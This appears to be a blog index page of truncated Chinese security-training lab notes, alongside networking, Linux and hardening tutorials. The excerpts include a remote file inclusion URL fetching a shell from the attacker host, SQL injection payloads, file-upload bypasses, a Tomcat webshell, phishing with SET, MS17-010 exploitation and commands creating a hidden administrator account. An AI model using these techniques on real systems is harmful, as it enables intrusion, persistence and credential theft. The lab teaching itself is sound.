m0_64338210的博客

原创 文件包含 （无视后缀）apache日志 远程文件包含 php封装伪协议：

1.本地文件包含：（无视后缀）2.远程文件包含远程包含shellallow_url_include开启访问: http://目标机ip/index.php?page=http://操作机ip/shell.txt目标机：操作机：3.apache日志文件包含个体get.shell修改文件 httpd.conf# CustomLog "logs/access.log" common去掉前面这个#号重启 apache访问http;//127.0.0.1:8

原创 sql 1~5关

第一关：1.访问SQLI-Labs网站，进入靶场右键打开检查，进入到Hackbar（火狐插件）输入http://ip/sqli-labs/less-1/?id=1点击Execute观察页面变化此时页面显示id=1的用户名Dump、密码Dump。2.寻找注入点分别使用以下3条payload寻找注入点及判断注入点的类型：http://ip/sqli-labs/less-1/?id=1' //报错http://ip/sqli-labs/less-1/?id=1'..

原创 Tomcat

把拖到/root下解压这个zip安装包：unzip vulhub-master查看解压文件：ls进入tomcat/下：查看tomcat路径：ls进入这个路径：安装docker-composedocker-compose up -d访问：访问http://ip+端口通过BurpSuite抓包点server点shell.jsp 把里面东西复制到抓的包下面连接冰蝎

原创 upload 1-5关

Upload第一关上传一个1.php文件，内容<?php phpinfo(); ?>在浏览右键选择检查第二关这一关是常见验证中的文件类型验证，也就是验证MIME信息上传一个2.php文件 内容<?php phpinfo(); ?>通过BurpSuite抓包右键点击send to repeater第三关查看源代码，我们可以发现是一个黑名单验证上一篇讲过黑名单是规定不允许上传的文件，但是如果黑名单定义不完整的

原创 数字型，字符型POST注入

实验步骤本实验的目标是:以SQLi-Labs网站的Less-11为入口，利用联合查询(unionselect)的方式实施SQL注入,获取 SQLi-Labs 网站的登录用户名和密码。1．访问SQLi-Labs网站在攻击机Pentest-Atk打开FireFox浏览器，并访问靶机A-SQLi-Labs 上的SQLi-Labs 网站Less-11。访问的URL为:http://[靶机IP]/sqli-labs/Less-11/2．利用Burpsuite 工具抓包(1）启动Burp

原创 数字型，字符型GET注入

SQL注入基于联合查询的字符型GET注入实验步骤：1.访问SQLi-Labs 网站在攻击机 Pentest-Atk打开FireFox浏览器，并访问靶机A-SQLi-Labs 上的sQLi-Labs 网站 Less-2。访问的URL为:http:/ /[靶机 IP]/sqli-labs/Less-2/正在上传…重新上传取消登录后，根据网页提示，先给定一个GET参数，即:http:// [靶机IP]/sqli-labs/Less-2 /?id=1此时页面显示 id=1的用户名Du

原创 sql注入数据库操作基础

连接数据库输入命令：mysql -u root -p显示系统中所有数据库名称输入命令：show databases;新建数据库student命令：create database student;查看结果：show databases;使用数据库student命令：use student;在数据库student中创建表result命令：create table result(id int(8),name varchar(20),city varchar(20),s..

原创 DNS信息查询

1.环境测试使用ping ，nslookup ，whois等命令，能够对域名做正确的DNS解析2.工具Whois nslookup dig subDonmainsBrute ip反查步骤利用相关命令进行针对域名的信息收集确定目标：sangforedu.com.cn sangfor.com.cn本次实验需要对该目标下的域名，ip进行信息收集使用whois命令对该域名进行查询：whois sangfor...

原创 子域名收集

实验步骤子域名爆破工具安装爆破工具登录kali 终端输出命令：git clone https://github.com/lijiejie/subDomainsBrute下载子域名爆破工具subDomainsBrute增加执行权限进入工具的文件夹，使用命令chomd +x subDomainsBrute给执行脚本程序赋予执行权限由此图可见，已成功给脚本文件增加执行权限使用工具，检查对应的域名存在的子域名注意：禁止对非授权域名进行探测，爆破，避免触犯国家相关法律法规

原创 渗透测试环境搭建与工具使用-SET配置使用

实验目的熟悉SET的配置使用，掌握利用SET构建钓鱼网站的方法。实验环境操作机：Kali2018-TS(1)操作系统：KaliLinux2018.4(2)登录账号密码：操作系统帐号root，密码Sangfor!7890靶机：pt-env(1)操作系统：Windows7(2)安装的应用软件：PHPStudy2013、DVWA漏洞网站环境(3)登录账号密码：操作系统帐号Administrator，密码Sangfor!7890实验原理SET(SocialE...

原创 渗透测试环境搭建与metasploit工具使用

-Metasploit配置使用2实验目的熟悉ms17-010漏洞的原理及利用方法，掌握Metasploit的配置使用方法。实验环境操作机：Kali2018-TS(1)操作系统：Kali Linux 2018.4(2)登录账号密码：操作系统帐号root，密码Sangfor!7890靶机 pt-env(1)操作系统：Windows(2)安装的应用软件：PHPStudy 2013、DVWA漏洞网站环境(3)登录账号密码：操作系统帐号Administrator，密码Sangf

原创 GER隧道 通用路由封装(GRE) 协议,实现互通

AR1#interface GigabitEthernet0/0/0ip address 172.16.1.254 255.255.255.0#interface GigabitEthernet0/0/1ip address 100.100.100.1 255.255.255.252ip route-static 0.0.0.0 0.0.0.0 100.100.100.2 //默认路由配置gre隧道#interface Tunnel0/0/1 ...

原创 单臂路由

单臂路由Lws1:vlan batch 10 20interface Ethernet0/0/1port link-type accessport default vlan 10interface Ethernet0/0/2port link-type accessport default vlan 10interface Ethernet0/0/3port link-type accessport default vlan 20interface Eth

原创 access与trunk 实现相同vlan互通

vlan batch 10 20interface Ethernet0/0/1port link-type accessport default vlan 10qinterface Ethernet0/0/2port link-type accessport default vlan 20qinterface Ethernet0/0/3port link-type trunkport trunk allow-pass vlan 2 to 4094...

原创 动态路由 通过ospf(动态路由)协议,实现相互通信

拓扑图先配置IP地址AR1sysint g0/0/0ip address 192.168.1.2 30int g0/0/1ip address 192.168.2.1 30AR2sysint g0/0/0ip address 192.168.2.2 30int g0/0/2ip address 192.168.6.1 30int g0/0/1ip address 192.168.3.1 30AR3sysint g0/0/0ip address 192....

原创 三层交换 VLAN间通过VlanIf(虚接口)进行通信

VLAN间通过VlanIf(虚接口)进行通信创建VLANsysvlan batch 10 20配置接口加入vlanint e0/0/1post link-type accessport default vlan 10int e0/0/2post link-type accessport default vlan 10int e0/0/3post link-type accessport default vlan 20int e0/0/4post

原创 TCP/IP协议栈模型分析

OSI的七种模型1 物理层 在媒介上传输比特流，提供机械和电气的规约。2 数据链路层 将分组数据封装成帧，在数据链路上实现数据的点到点，或点到多点方式的直接通信，差错检测。3 网络层 定义逻辑地址，实现数据从源到目的的转发。4 传输层 建立，维护和取消一次端到端的数据传输过程，控制传输节奏的快慢，调制数据的排序等等。5 会话层 在通信双方之间建立，管理和终止会话。6 表示层 进行数据格式的转换，以确保一个系统生成的应用层数据能够被另一个系统的应用层数据所识别和理解。7 应用层 对

原创 Windows隐藏账户处置

实验目的理解windows隐藏账户建立原理，掌握windows隐藏账户处置过程实验环境一台windows server 2012 r2实验原理通过注册表实现隐藏账户的建立，可以通过手工来建立隐藏账户实验步骤一、使用命令行创建用户1、打开命令行2、新建test$用户net user test$ sxf!7890 /addnet localgroup administrators test$ /add二、观察test$用户1、使用系统...

原创 基线管理之apache安全配置

实验目的理解apache安全配置项的作用，掌握安全配置项的配置方法实验原理通过编辑apache配置文件实现apache的安全配置，apache默认配置文件路径是/etc/httpd/conf/httpd.conf一、确保apache无法访问根目录查看apache配置文件，确定里面对根目录是拒绝所有请求vim /etc/httpd/conf/httpd.其中，第一行和第四行，指明了目录，即Linux的根目录 /第二行，表示禁止使用.htaccess文件，覆盖此处配.

原创 基线管理之MariaDB安全配置

1、操作系统级权限检查（1）、检查数据库的运行权限，不建议以root运行数据库，防止越权攻击 ps -ef | egrep "^mysql.*$"（2）禁用mariadb的历史记录功能 查找缓存文件 find $HOME -name ".mysql_history"将缓存文件指向空文件rm -f $HOME/.mysql_historyln -s /dev/null $HOME/.mysql_history（3）、查看并配置数据...

原创 基线管理之Windows安全配置

实验目的理解windows安全配置选项，掌握Windows组策略配置，理解Windows安全配置检查工具的应用。实验拓扑略实验环境一台windows server 2012 R2实验原理windows通过组策略展示了详细的操作系统配置，通过配置组策略，将设置保存于windoows注册表，以便操作系统加载各项配置。实验步骤一、登录服务器，打开组策略二、账户策略配置1、密码策略依次如图展开，密码策略，如图进行配置2、账户锁定策略配置账户锁定阈值.

原创 基线管理之Centos安全配置

实验目的通过配置Centos配置文件，加强Centos默认安全配置。同时也是理解linux一切皆文件的思想。尝试用shell脚本来处置Centos的安全配置。实验原理Linux操作系统的配置基本上以配置文件展示，通过不同配置文件理解不同的配置。实验步骤一、网络配置1、检查不用的连接使用以下命令ip link show up2、关闭IP转发先查看ip转发配置sysctl net.ipv4.ip_forward查看发现为0，如果是1，可以使用下..

原创 Windows基础 加固

Win+r 输入cmd 跳出来dos系统界面Dir 列出所有文件Cd 进入某一个目录Cd .. 返回上一个目录Dir /a 显示出全部目录文件夹有空格，需要双引号没有空格，不需要引号切换到其它盘符D:Md 文件夹名 //创建文件夹dir // 显示当前目录中的子文件夹与文件Dir /a //显示隐藏文件例：dir /b // 只显示当前目录中的子文...

原创 一． Linux主机系统加固

1. 账号和口令禁用或删除无用账号减少系统无用账号，降低安全风险。操作步骤1.cat /etc/shadow 查看有多少账户 2.使用命令 userdel <用户名> 删除不必要的账号。3.使用命令 passwd -l <用户名> 锁定不必要的账号。4.使用命令 passwd -u <用户名> 解锁必要的账号。检查特殊账号检查是否存在空口令和root权限的账号。操作步骤查看空口令和root权限账号，确认...

原创 OPENSSL基础使用 密码学之apache部署https 密码学之使用密钥登录SSH服务器

1.OPENSSL基础使用实验目的掌握常见的密码学算法应用，包含des aes md5 rsa等实验环境一台Centos 7.2 已经安装openssl组件实验原理openssl是Linux内置的一款开源工具，实现了常见的密码算法与应用。通过openssl操作，完成各种密码算法的应用。实验步骤创建一个文件，用于被加密，文件内容为12345,文件名为test.txtecho 12345 >test.txt一、对称加密1、使用rc4加解密加密ope.

原创 PHP 魔术常量 一句话制作木马$_GET $_POST include命令

原创 PHP 字符串变量 PHP 运算符

1.PHP strlen() 函数返回字符串 "Hello world!" 的长度：<?phpecho strlen("Hello world!");?>//上面的代码将输出：12\strlen() 常常用在循环和其他函数中，因为那时确定字符串何时结束是很重要的2.PHP 并置运算符<?php$txt1="Helloworld!";$txt2="Whataniceday!";echo$txt1."".$txt2;?>//并置运算...

原创 php变量 While 循环 局部和全局作用域 For 循环 if...elseif....else 语句 PHP Switch 在局部变量里输出全局变量

<?php$x=5;$y=6;$z=$x+$y;echo $z;//变量以 $ 符号开始，后面跟着变量的名称,从$z=$x+$y看，可以计算出 z 的值为 11echo'<br>';//2.创建（声明）PHP 变量$txt="Hello world!";$x=5;$y=10.5;echo $txt;//所以它是全局变量 ， $y 变量在函数内声明所以它是局部变量。//当您赋一个文本值给变量时，请在文本值两侧加上引号。//在上面的语句执行中，变量 txt 将保存

原创 JavaScript 与php phpstudy安装

一.JavaScript 简介1.JavaScript 是脚本语言JavaScript 是一种轻量级的编程语言。JavaScript 是可插入 HTML 页面的编程代码。JavaScript 插入 HTML 页面后，可由所有的现代浏览器执行。JavaScript 很容易学习。2.JavaScript：直接写入 HTML 输出流<script>document.write("<h1>这是一个标题</h1>");document.write("

原创 df指令 netstat -tnlp指令 find指令 chown uname指令 uname指令

1、df指令作用：查看磁盘的空间语法：#df -h -h表示以可读性较高的形式展示大小2.netstat -tnlp指令作用：查看网络连接状态语法：#netstat -tnlp3.find指令作用：用于查找文件（其参数有55个之多）语法：#find路径范围选项选项的值选项： -name：按照文档名称进行搜索（支持模糊搜索） -type：按照文档的类型进行搜索 文档类型：“-”表示文...

原创 html基础 ＜标签＞ 快捷键 HTTP 状态消息 HTTP与HTTPS的区别

HTML简介1.<!DOCTYPE html>声明为 HTML5 文档2.<html>元素是 HTML 页面的根元素3.<head>元素包含了文档的元（meta）数据，如<meta charset="utf-8">定义网页编码格式为utf-84.<title>元素描述了文档的标题5.<body>元素包含了可见的页面内容6.<h1>元素定义一个大标题7.<p>元素定义...

原创 Linux之grep与正则表达式 sed与awk LAMP网站构架

Linux之grep与正则表达式熟练掌握grep命令用法grep命令用于查找文件里符合条件的字符串，查找包含指定的范本样式的文件，如果发现某文件的内容符合所指定的范本样式，则会把含有范本样式的那一行显示出来。grep 选项 需要捕获的文字 目标文件如果我们从/etc/passwd中查找tcpdump相关的用户信息grep tcpdump/etc/passwd-A 显示捕获行之后行数-B 显示捕获行之前行数-C 显示捕获行前后的行数-c 显示符合条件的...

原创 linux Kali更新源 忘记root密码如何登陆 Centos更新yum源

一Kali更新源1..2.3.4.5.复制到编辑器里面deb http://mirrors.aliyun.com/kali kali-rolling main non-free contribdeb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contribdeb http://mirrors.aliyun.com/kali-security kali-rolling/upda

原创 Liunx

一 1. liunx系统安装2.打开vmware，选择镜像 配置登陆信息 设置虚拟文件位置 配置处理器和内存 网络和硬盘二 1.切换到命令行时登陆，输入密码没有回显命令行快捷键 ctrl+c:z终止当前的输入Tab键ifconfig查看当前接口状态ss -lnt查看当前开放的tcp端口查看root下的文件通过history命令可以查看以前执行过的命令！+数字 执行history指定编号命令三 1.ls /显示linux根目录下的文件目录/bo.